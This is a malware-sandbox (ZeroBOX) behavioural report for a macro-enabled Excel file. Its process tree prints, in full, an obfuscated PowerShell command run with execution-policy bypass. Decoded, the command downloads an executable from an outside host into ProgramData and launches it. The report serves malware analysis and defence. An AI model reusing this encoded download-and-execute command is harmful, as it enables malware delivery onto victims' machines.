popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\document.xlsm

    1728

  • cmd.exe cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBvAGYAdABlAHIAcwB5AHUALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABlAHQAZQByAG0AaQBuAGEAbgB0AHMALwBiAGUAdAB1AGwAaQBuAGkAYwAvAG0AdQBkAG0AaQBuAG4AbwB3AHMAIgApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAkAG0AZQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACQAcgBlAHEALgBDAG8AcAB5AFQAbwAoACQAbQBlAG0AKQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBvAGYAdABlAHIAcwB5AHUAIABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAJABtAGUAbQAuAFQAbwBBAHIAcgBhAHkAKAApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlAAoAJAByAGUAcQAuAEMAbABvAHMAZQAoACkACgAkAG0AZQBtAC4AQwBsAG8AcwBlACgAKQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBvAGYAdABlAHIAcwB5AHUAIABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgA="

    1716

    • powershell.exe powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBvAGYAdABlAHIAcwB5AHUALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABlAHQAZQByAG0AaQBuAGEAbgB0AHMALwBiAGUAdAB1AGwAaQBuAGkAYwAvAG0AdQBkAG0AaQBuAG4AbwB3AHMAIgApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAkAG0AZQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACQAcgBlAHEALgBDAG8AcAB5AFQAbwAoACQAbQBlAG0AKQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBvAGYAdABlAHIAcwB5AHUAIABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAJABtAGUAbQAuAFQAbwBBAHIAcgBhAHkAKAApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlAAoAJAByAGUAcQAuAEMAbABvAHMAZQAoACkACgAkAG0AZQBtAC4AQwBsAG8AcwBlACgAKQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBvAGYAdABlAHIAcwB5AHUAIABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgA=

      2000

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf